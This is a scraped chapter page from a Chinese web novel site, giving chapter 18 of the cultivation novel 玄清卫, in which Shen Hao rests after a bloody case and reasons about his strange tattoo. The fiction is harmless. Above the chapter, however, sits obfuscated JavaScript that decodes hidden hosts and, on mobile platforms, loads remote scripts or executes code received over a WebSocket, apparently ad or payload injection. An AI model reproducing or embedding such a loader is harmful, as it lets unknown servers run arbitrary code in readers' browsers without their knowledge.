笔趣阁

字:
关灯 护眼
笔趣阁 > 玄清卫 > 第18章 旁听
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第18章 旁听

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
当晚。
  回到自己租下的小院里沈浩一如既往的一脸疲累。
  又是连续好多天没睡好了,中间还有两场搏杀,脑子里更是算来算去没个消停,这是最耗精力的。
  “呼......”
  瘫坐在椅子上,取下身上的累赘,顺手从架子上抓了一壶酒,打开塞子就往嘴里灌。
  扫尾的事情王俭已经在办了。这次办了大案但牺牲却也不少,前后足有七十六人,受伤的也有二十多人。
  由此可见基层的玄清卫对上邪门修士和邪祟有多弱势。
  这些人不全是丙字营甲组的,大部分其实是从总旗那边调过来增援的,隶属关系是在总旗陈天问麾下。但是沈浩没有差别对待,该走私账额外加贴抚恤的他一点不含糊,反正各旗各组设有私账这回事并不是什么秘密,大家心照不宣罢了。
  不过想要拿到正式的嘉奖估计还要等几天。三天后才是大案告会,到时候陈天问才会将这个案子在会上通报上去,这是最优的选择。同时也是留出时间来给刑讯的杀才们撬开“肖重六”的嘴巴,一旦坐实了是“那群人”中的一员的话,这个功劳就真的大了去了。
  一壶酒喝完倦意徐徐袭来,沈浩也没有再抗拒,就这么躺在椅子上便眯睡着了。
  ......
  再次醒来已经是第二天中午,草草的在外面随便吃了点东西沈浩就再次回到屋里,他身上的诡异事件现在该好好捋一捋了。
  首先,沈浩盘膝坐在蒲团上运转自己的《大五行真气箓》,一个周天之后敛气收功。
  “这......”
  之前一颗邪核便让沈浩每周天之后增涨的真气暴涨三倍,而现在暴涨再现,直接从三倍变成了十倍不止!
  确切的说是正常状态的十五倍!
  找这种修炼速度,连续一个月的话就相当于以前苦修一年半的积累效果?!
  沈浩有些被吓到了。修行很多时候并不是进度越快越好的,更何况这种诡异的情况。
  去掉上衣,沈浩对着铜镜看着自己胸口处的黑兽纹身,用手触摸并无异样,回想起之前的一幕幕他只能在脑中念头:你到底是什么东西?
  自从吞了那颗邪核之后沈浩就有种悚然的感觉,他觉得自己身上的这道纹身是“活”的。
  好在沈浩习惯了从没头没脑的事件里捋出头绪,所以他很自然的就给自己身上的这些诡异变化来了一个推理,暂时他自己觉得还能说得通。
  “邪核属于邪祟核心,阴豆腐属于丹药类消耗品,但归根结底都是纯度极高的能量。这些能量被我吞下去之后并没有直接在我的体内转化而是被储存到了黑兽纹身当中,这也是我没有因为吞下它们而暴毙的原因。
  所以,现在我在修行中突然暴涨的真气收益实际上只是纹身将转化后变得可吸收的邪核和阴豆腐里的能量精华缓慢的回馈给我。这样推导没问题吧?而且要是这些推导都没错,那么这种暴涨的情况就不是无限制的,一旦纹身消耗光了那颗邪核和阴豆腐的能量之后应该就会重回之前的状态了。
  可问题是,这个纹身到底什么来头?”
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师